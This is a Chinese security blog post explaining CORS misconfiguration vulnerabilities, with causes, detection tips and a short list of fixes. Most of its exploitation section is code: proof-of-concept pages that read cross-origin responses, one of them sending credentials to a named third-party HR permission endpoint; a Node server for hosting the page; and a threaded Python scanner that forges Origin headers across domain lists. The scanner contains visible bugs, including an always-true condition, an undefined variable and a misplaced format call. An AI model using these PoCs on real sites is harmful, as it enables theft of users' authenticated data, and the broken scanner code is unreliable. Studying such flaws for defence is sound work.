<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="CORS漏洞（2）：跨域资源共享漏洞, 域名之外">
    <meta name="description" content="CORS的出现是为了弥补同源策略的不足，它是一种用来绕过同源策略来实现跨域资源访问的一种技术。">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>CORS漏洞（2）：跨域资源共享漏洞 | 域名之外</title>
    <link rel="icon" type="image/png" href="/favicon.png">
    
    <style>
        body{
            background-image: url(/medias/banner/back.jpg);
            background-repeat:no-repeat;
            background-size: 100% 100%;
            background-attachment:fixed;
        }
    </style>



    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>
    <script src="/js/jquery.pjax.js"></script>
    <script>
        $(document).pjax('a:not(a[target="_blank"])', '#pjax-container', {fragment: '#pjax-container', timeout: 8000});
    </script>

<meta name="generator" content="Hexo 7.0.0"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/favicon2.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">域名之外</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/favicon2.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">域名之外</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>


    <main id="pjax-container">
        



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/9.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">CORS漏洞（2）：跨域资源共享漏洞</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                                <span class="chip bg-color">漏洞</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Web%E5%AE%89%E5%85%A8/" class="post-category">
                                Web安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-04-27
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>CORS的出现是为了弥补同源策略的不足，它是一种用来绕过同源策略来实现跨域资源访问的一种技术。</p>
<span id="more"></span>

<h3 id="CORS-跨域资源共享-概念介绍"><a href="#CORS-跨域资源共享-概念介绍" class="headerlink" title="CORS 跨域资源共享 概念介绍"></a>CORS 跨域资源共享 概念介绍</h3><p>Cors（Cross-origin resource sharing，”跨域资源共享”）的出现是用来弥补SOP（同源策略）的不足。在当时SOP有些限制了网页的业务需求，不能够使不同域的网页互相访问，因此提出了Cors：用于绕过SOP（同源策略）来实现跨域资源访问的一种技术。</p>
<p>Cors漏洞就是攻击者利用Cors（跨域资源共享）技术来获取用户的敏感数据，从而导致用户敏感信息泄露。</p>
<p>它允许浏览器向跨源服务器，发出XMLHttpRequest请求，从而克服了AJAX只能同源使用的限制。</p>
<h3 id="CORS分类："><a href="#CORS分类：" class="headerlink" title="CORS分类："></a>CORS分类：</h3><p>Cors请求可分为两类，简单请求和非简单请求。</p>
<p><strong>简单请求和非简单请求不影响漏洞，漏洞产生原因在于没有对请求源做严格限制。</strong></p>
<h4 id="1：非简单请求"><a href="#1：非简单请求" class="headerlink" title="1：非简单请求"></a>1：非简单请求</h4><p>非简单请求就是在正式请求之前，先进行预检请求，询问服务器该域名是否在服务器可请求名单中，得到答复后再执行。</p>
<h4 id="2：简单请求"><a href="#2：简单请求" class="headerlink" title="2：简单请求"></a>2：简单请求</h4><p>简单请求就是浏览器直接发出cors请求，就是在头信息中直接加个Origin字段。</p>
<p>所谓简单请求，就是请求方式为GET，POST，HEAD这三种之一，并且HTTP头不超出（Accept，Accept-Language，Content-Language，Lat-Event-ID，Content-Type）这几种字段【应该没有涵盖全】。</p>
<p>当浏览器发现服务器的请求为简单请求时，会在头信息里加入Origin字段。Origin字段代表此次请求来自哪个域，服务器就可以检验是否来自该域。如果匹配，服务器就会在响应里增添几个字段：</p>
<p><code>Access-Control-Allow-Origin</code> 规定服务器资源允许被哪些域访问</p>
<p><code>Access-Control-Allow-Credentials</code>   请求中是否允许发送cookie</p>
<p><code>Access-Control-Expose-Headers</code> 允许跨域请求发送额外的headers字段</p>
<p><code>Access-Control-Request-Method</code>  哪些请求类型是被允许的</p>
<p><code>Access-Control-Max-Age</code>  指定本次请求的有效期</p>
<p>其中响应中的<code> Access-Control-Allow-Origin</code>是必须有的（它指示了目标域接受来自哪个域的跨域请求，即允许哪个域访问），而剩下几个可有可无。</p>
<p>当字段值为‘*’时，就代表任意域都可以访问，这样就导致了Cors漏洞的产生。</p>
<p>而<code> Access-Control-Allow-Origin</code>这个头的值是在目标域的服务端进行配置的，一般这个头的值都会设计成一个白名单，而这个白名单的设计方式就是通过正则实现<strong>（记住：有正则的地方就会有绕过的！）</strong></p>
<p>而一些都根本没有考虑这个问题，如下图：</p>
<p><img src="https://cdn.jsdelivr.net/gh/highgerms/Picture_blog_highgerms@main/image-20230427112223155.png" alt="image-20230427112223155"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">请求包</span><br><span class="line">Origin: https://www.baidu.com</span><br><span class="line"></span><br><span class="line">响应包</span><br><span class="line">Access-Control-Allow-Origin: https://www.baidu.com</span><br></pre></td></tr></table></figure>

<p>POC如下：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;!DOCTYPE&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">function loadXMLDoc()</span><br><span class="line">&#123;</span><br><span class="line">    var xhr = new XMLHttpRequest();</span><br><span class="line"></span><br><span class="line">    xhr.onreadystatechange=function()</span><br><span class="line">    &#123;</span><br><span class="line">        if(xhr.readyState == 4 &amp;&amp; xhr.status == 200) //if receive xhr response</span><br><span class="line">        &#123;</span><br><span class="line">            var datas=xhr.responseText;</span><br><span class="line">            alert(datas);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    //request vuln page</span><br><span class="line">    xhr.open(&quot;GET&quot;,&quot;http://www.target.com&quot;,&quot;true&quot;) //网页地址</span><br><span class="line">    xhr.send();</span><br><span class="line">&#125;</span><br><span class="line">loadXMLDoc();</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">这是一段HTML代码，其中包含了一个脚本（JavaScript），用于向特定网址发出XMLHttpRequest请求，并在收到响应后显示响应数据。下面对代码进行逐行解释：</span><br><span class="line"></span><br><span class="line">- `&lt;!DOCTYPE&gt;`：这是文档类型声明，指定该HTML文档遵循的标准类型。</span><br><span class="line">- `&lt;html&gt;`：这是HTML文档的根元素，定义了整个文档的结构。</span><br><span class="line">- `&lt;script type=&quot;text/javascript&quot;&gt;`：这是一个脚本元素，指示该元素包含JavaScript代码。`type`属性指定脚本语言的类型，这里是JavaScript。</span><br><span class="line">- `function loadXMLDoc()`：这是一个JavaScript函数，它封装了向指定地址发出XMLHttpRequest请求的逻辑。</span><br><span class="line">- `var xhr = new XMLHttpRequest();`：这是创建一个XMLHttpRequest对象，可以通过它来向服务器发送HTTP请求并接收响应。</span><br><span class="line">- `xhr.onreadystatechange=function() &#123; ... &#125;`：这是为XMLHttpRequest对象添加一个事件监听器。当服务器返回响应时，该事件监听器将调用一个匿名函数进行处理。</span><br><span class="line">- `if(xhr.readyState == 4 &amp;&amp; xhr.status == 200)`：这是判断服务器响应是否成功的条件。`readyState`属性表示当前XMLHttpRequest对象的状态，4代表已经收到所有响应数据；`status`属性表示服务器返回的状态码，200代表请求成功。</span><br><span class="line">- `var datas=xhr.responseText;`：如果服务器响应成功，将响应数据赋值给变量`datas`。</span><br><span class="line">- `alert(datas);`：在浏览器中弹出一个警示框，显示接收到的响应数据。</span><br><span class="line">- `xhr.open(&quot;GET&quot;,&quot;http://www.target.com&quot;,&quot;true&quot;)`：向指定地址发出GET请求。第一参数是请求方法，第二个参数是请求URL地址，第三个参数是是否异步发送请求（true表示异步，false表示同步）。</span><br><span class="line">- `xhr.send();`：将XMLHttpRequest对象的请求发送到服务器端。</span><br><span class="line"></span><br><span class="line">综上，这段HTML代码定义了一个函数`loadXMLDoc()`，它通过XMLHttpRequest发送HTTP请求，接收并处理服务器返回的响应数据。然后通过调用该函数来执行请求和响应的过程。</span><br><span class="line"></span><br><span class="line">这是一段包含 JavaScript 和 HTML 代码的 web 页面。具体来说，这个页面创建了一个名为 loadXMLDoc 的 JavaScript 函数，该函数使用 AJAX（Asynchronous JavaScript and XML）技术从指定的 URL 获取数据并在获取到响应后显示弹出窗口。</span><br><span class="line"></span><br><span class="line">更具体地说，当页面加载时，函数 loadXMLDoc 将被调用。该函数首先创建了一个 XMLHttpRequest 对象 xhr，然后对其进行配置以发送 HTTP GET 请求。请求的 URL 是 &quot;http://www.target.com&quot;，即目标网站的地址。在发送请求之后，函数设置了 onreadystatechange 事件处理程序，以便在接收到响应后执行一些操作。</span><br><span class="line"></span><br><span class="line">当 xhr.readyState 变为 4 且 xhr.status 等于 200 时，意味着服务器已经成功地响应了该请求，并且返回了数据。此时，函数从 xhr.responseText 属性中获取数据，然后在弹出窗口中将其显示出来。</span><br><span class="line"></span><br><span class="line">需要注意的是，这段代码仅仅是一个示例，它只是展示了如何使用 AJAX 技术从服务器获取数据，而没有考虑安全性。如果直接在实际的项目中使用这段代码，可能会存在一些潜在的安全风险，比如 CSRF（跨站点请求伪造）攻击等。因此，在实际开发中，应该考虑更加严格的安全措施。</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="漏洞产生原因"><a href="#漏洞产生原因" class="headerlink" title="漏洞产生原因"></a>漏洞产生原因</h3><p>配置不当，没有限制请求的源，例如Access-Control-Allow-Origin 设置为*，允许任意源请求访问 ，或设置请求源的域名没有完整，没有对请求源的域做严格限制，导致任意源都可以访问，造成cors漏洞。</p>
<h3 id="漏洞利用思路"><a href="#漏洞利用思路" class="headerlink" title="漏洞利用思路"></a>漏洞利用思路</h3><p>例如某一站点没有对请求源的域做严格限制，这时候攻击者制作一个恶意页面让目标去点击，目标点击后攻击者就可以获取到当前目标所在页面的信息。</p>
<h3 id="挖掘思路"><a href="#挖掘思路" class="headerlink" title="挖掘思路"></a>挖掘思路</h3><p>根据上方CORS跨域漏洞出现的请求包特征，burp中可以自动添加origin头寻找CORS配置错误，</p>
<p><img src="https://cdn.jsdelivr.net/gh/highgerms/Picture_blog_highgerms@main/image-20230427121654336.png" alt="image-20230427121654336"></p>
<p>改了之后一些请求包会不在burp数据流中，导致失败。</p>
<p><img src="https://cdn.jsdelivr.net/gh/highgerms/Picture_blog_highgerms@main/image-20230427121924413.png" alt="image-20230427121924413"></p>
<p><img src="https://cdn.jsdelivr.net/gh/highgerms/Picture_blog_highgerms@main/image-20230427122140632.png" alt="image-20230427122140632"></p>
<p>查看是否存在get请求的json形式敏感信息，在请求头中添加任意Origin值，如<a href="https://evil.com，查看返回头是否返回：Access-Control-Allow-Origin:https://evil.com和Access-Control-Allow-Credentials：true，若返回，则构造poc.html进行跨域读取数据。">https://evil.com，查看返回头是否返回：Access-Control-Allow-Origin:https://evil.com和Access-Control-Allow-Credentials：true，若返回，则构造poc.html进行跨域读取数据。</a></p>
<h5 id="一个探测cors的py脚本"><a href="#一个探测cors的py脚本" class="headerlink" title="一个探测cors的py脚本"></a>一个探测cors的py脚本</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">import requests</span><br><span class="line">from threading import Thread,activeCount</span><br><span class="line">from queue import Queue</span><br><span class="line">from sys import argv</span><br><span class="line"></span><br><span class="line">def cors_test(domain):</span><br><span class="line">        if &#x27;http://&#x27; or &#x27;https://&#x27; not in domain:</span><br><span class="line">                domain = &#x27;http://&#x27; + domain.strip()</span><br><span class="line">        try:</span><br><span class="line">                characters = &#x27;!@#$%^&amp;*()_+~/*&#x27;</span><br><span class="line">                headers = &#123;</span><br><span class="line">                &#x27;User-Agent&#x27;: &#x27;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36&#x27;,</span><br><span class="line">                &#x27;Origin&#x27;: &#x27;&#123;&#125;&#x27;.format(&#x27;http://www.abc.com&#x27;)</span><br><span class="line">                &#125;</span><br><span class="line">                req1 = requests.get(domain,headers=headers,timeout=(5,20),verify=False,allow_redirects=False)</span><br><span class="line">                if &quot;Access-Control-Allow-Origin&quot; and &quot;Access-Control-Allow-Credentials&quot; in req1.headers:</span><br><span class="line">                        if req1.headers[&#x27;Access-Control-Allow-Origin&#x27;] == headers[&#x27;Origin&#x27;]:</span><br><span class="line">                                print(&#x27;[+]Mode 1：CORS Found &#123;&#125; &#123;&#125; &#123;&#125;&#x27;.format(domain.replace(&#x27;http://&#x27;,&#x27;&#x27;),req1.headers[&#x27;Access-Control-Allow-Origin&#x27;],req1.headers[&#x27;Access-Control-Allow-Credentials&#x27;]))</span><br><span class="line">                                with open(&#x27;cors_success.txt&#x27;,&#x27;a+&#x27;) as f:</span><br><span class="line">                                        f.write(&#x27;&#123;&#125; &#123;&#125; &#123;&#125; \n&#x27;.format(domain.replace(&#x27;http://&#x27;,&#x27;&#x27;),req1.headers[&#x27;Access-Control-Allow-Origin&#x27;],req1.headers[&#x27;Access-Control-Allow-Credentials&#x27;]))</span><br><span class="line">                        else:</span><br><span class="line">                                headers[&#x27;Origin&#x27;] = domain + &#x27;.baidu.com&#x27;</span><br><span class="line">                                req2 = requests.get(domain,headers=headers,timeout=(5,20),verify=False,allow_redirects=False)</span><br><span class="line">                                if req2.headers[&#x27;Access-Control-Allow-Origin&#x27;] == headers[&#x27;Origin&#x27;]:</span><br><span class="line">                                        print(&#x27;[+]Mode 2：CORS Found &#123;&#125; &#123;&#125; &#123;&#125;&#x27;.format(domain.replace(&#x27;http://&#x27;,&#x27;&#x27;),req2.headers[&#x27;Access-Control-Allow-Origin&#x27;],req2.headers[&#x27;Access-Control-Allow-Credentials&#x27;]))</span><br><span class="line">                                        with open(&#x27;cors_success.txt&#x27;,&#x27;a+&#x27;) as f:</span><br><span class="line">                                                f.write(&#x27;&#123;&#125; &#123;&#125; &#123;&#125; \n &#x27;.format(domain.replace(&#x27;http://&#x27;,&#x27;&#x27;),req2.headers[&#x27;Access-Control-Allow-Origin&#x27;],req2.headers[&#x27;Access-Control-Allow-Credentials&#x27;]))</span><br><span class="line">                                else:</span><br><span class="line">                                        for character in characters:</span><br><span class="line">                                                headers[&#x27;Origin&#x27;] = domain + character + &#x27;.baidu.com&#x27;</span><br><span class="line">                                                req3 = requests.get(domain,headers=headers,timeout=(5,20),verify=False,allow_redirects=False)</span><br><span class="line">                                                if req3.headers[&#x27;Access-Control-Allow-Origin&#x27;] == headers[&#x27;Origin&#x27;]:</span><br><span class="line">                                                        print(&#x27;[+]Mode 3：CORS Found &#123;&#125; &#123;&#125; &#123;&#125;&#x27;.format(domain.replace(&#x27;http://&#x27;,&#x27;&#x27;),req3.headers[&#x27;Access-Control-Allow-Origin&#x27;],req3.headers[&#x27;Access-Control-Allow-Credentials&#x27;]))</span><br><span class="line">                                                        with open(&#x27;cors_success.txt&#x27;,&#x27;a+&#x27;) as f:</span><br><span class="line">                                                                f.write(&#x27;&#123;&#125; &#123;&#125; &#123;&#125; \n&#x27;).format(domain.replace(&#x27;http://&#x27;,&#x27;&#x27;),req3.headers[&#x27;Access-Control-Allow-Origin&#x27;],req3.headers[&#x27;Access-Control-Allow-Credentials&#x27;])</span><br><span class="line">                                                else:</span><br><span class="line">                                                        if req.headers[&#x27;Access-Control-Allow-Origin&#x27;]:</span><br><span class="line">                                                                print(&#x27;[+]maybe CORS Found &#123;&#125; &#123;&#125; &#123;&#125;&#x27;.format(domain.replace(&#x27;http://&#x27;,&#x27;&#x27;),req3.headers[&#x27;Access-Control-Allow-Origin&#x27;],req3.headers[&#x27;Access-Control-Allow-Credentials&#x27;]))</span><br><span class="line"></span><br><span class="line">        except Exception as e:</span><br><span class="line">                print(&#x27;[-]&#x27; + domain.replace(&#x27;http://&#x27;,&#x27;&#x27;) + &#x27; &#x27; +  str(e))</span><br><span class="line">                pass</span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">        try:</span><br><span class="line">                if argv[1]:</span><br><span class="line">                        queue = Queue()</span><br><span class="line">                        filename = open(argv[1],&#x27;r+&#x27;)</span><br><span class="line">                        for url in filename:</span><br><span class="line">                                queue.put(url.strip())</span><br><span class="line">                        filename.close()</span><br><span class="line">                        while queue.qsize()&gt;0:</span><br><span class="line">                                if activeCount()&lt;= 10:</span><br><span class="line">                                        Thread(target=cors_test,args=(queue.get(),)).start()</span><br><span class="line">        except IndexError:</span><br><span class="line">                print(&#x27;Usage：python3 cors_test.py filename.txt&#x27;)</span><br></pre></td></tr></table></figure>



<h5 id="serve-js"><a href="#serve-js" class="headerlink" title="serve.js"></a>serve.js</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">var http = require(&#x27;http&#x27;);</span><br><span class="line">var url  = require(&#x27;url&#x27;);</span><br><span class="line">var fs   = require(&#x27;fs&#x27;);</span><br><span class="line">var port = 80</span><br><span class="line"></span><br><span class="line">http.createServer(function(req, res) &#123;</span><br><span class="line">    if (req.url == &#x27;/cors-poc&#x27;) &#123;</span><br><span class="line">        fs.readFile(&#x27;cors.html&#x27;, function(err, data) &#123;</span><br><span class="line">            res.writeHead(200, &#123;&#x27;Content-Type&#x27;:&#x27;text/html&#x27;&#125;);</span><br><span class="line">            res.write(data);</span><br><span class="line">            res.end();</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        res.writeHead(200, &#123;&#x27;Content-Type&#x27;:&#x27;text/html&#x27;&#125;);</span><br><span class="line">        res.write(&#x27;never gonna give you up...&#x27;);</span><br><span class="line">        res.end();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;).listen(port, &#x27;0.0.0.0&#x27;);</span><br><span class="line">console.log(`Serving on port $&#123;port&#125;`);</span><br></pre></td></tr></table></figure>





<p>利用步骤大概如下：</p>
<ul>
<li>准备一个开启了泛解析的域名，这个域名指向你的主机</li>
<li>NodeJS</li>
</ul>
<p>为啥要准备NodeJS呢？</p>
<p>因为Apache和Nginx对这些有特殊字符的域名支持都不太好，所以，我们直接用NodeJS在我们的主机上搭建一个Server比较好</p>
<p>然后在同目录下创建一个<code>cors.html</code></p>
<h5 id="cors-html"><a href="#cors-html" class="headerlink" title="cors.html"></a>cors.html</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;&lt;title&gt;CORS&lt;/title&gt;&lt;/head&gt;</span><br><span class="line">&lt;body onload=&quot;cors();&quot;&gt;</span><br><span class="line">&lt;center&gt;</span><br><span class="line">cors proof-of-concept:&lt;br&gt;&lt;br&gt;</span><br><span class="line">&lt;textarea rows=&quot;10&quot; cols=&quot;60&quot; id=&quot;pwnz&quot;&gt;</span><br><span class="line">&lt;/textarea&gt;&lt;br&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line"></span><br><span class="line">&lt;script&gt;</span><br><span class="line">function cors() &#123;</span><br><span class="line">  var xhttp = new XMLHttpRequest();</span><br><span class="line">  xhttp.onreadystatechange = function() &#123;</span><br><span class="line">    if (this.readyState == 4 &amp;&amp; this.status == 200) &#123;</span><br><span class="line">      document.getElementById(&quot;pwnz&quot;).innerHTML = this.responseText;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;;</span><br><span class="line">  xhttp.open(&quot;GET&quot;, &quot;https://gateway-q.test.xdf.cn/hr-permission-web/auth/permission/loginUserPermission&quot;, true);</span><br><span class="line">  xhttp.withCredentials = true;</span><br><span class="line">  xhttp.send();</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h4><p>1.不要将Access-Control-Allow-Origin字段设置为*</p>
<p>2.严格校验Origin字段的值</p>
<p>3.HTTPS 网站不要信任HTTP 域</p>
<p>4.不要信任全部自身子域，减少攻击面</p>
<h3 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h3><p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/eayXNlhiNO7TEaF8S9ZZKA">https://mp.weixin.qq.com/s/eayXNlhiNO7TEaF8S9ZZKA</a>   CORS配置不当—挖掘技巧及实战案例全汇总</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/323358.html">https://www.freebuf.com/vuls/323358.html</a>   CORS漏洞详解</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">highgerms</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://highgerms.github.io/2023/04/27/CORS%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">http://highgerms.github.io/2023/04/27/CORS%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">highgerms</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                                    <span class="chip bg-color">漏洞</span>
                                </a>
                            
                        </div>
                    
                </div>
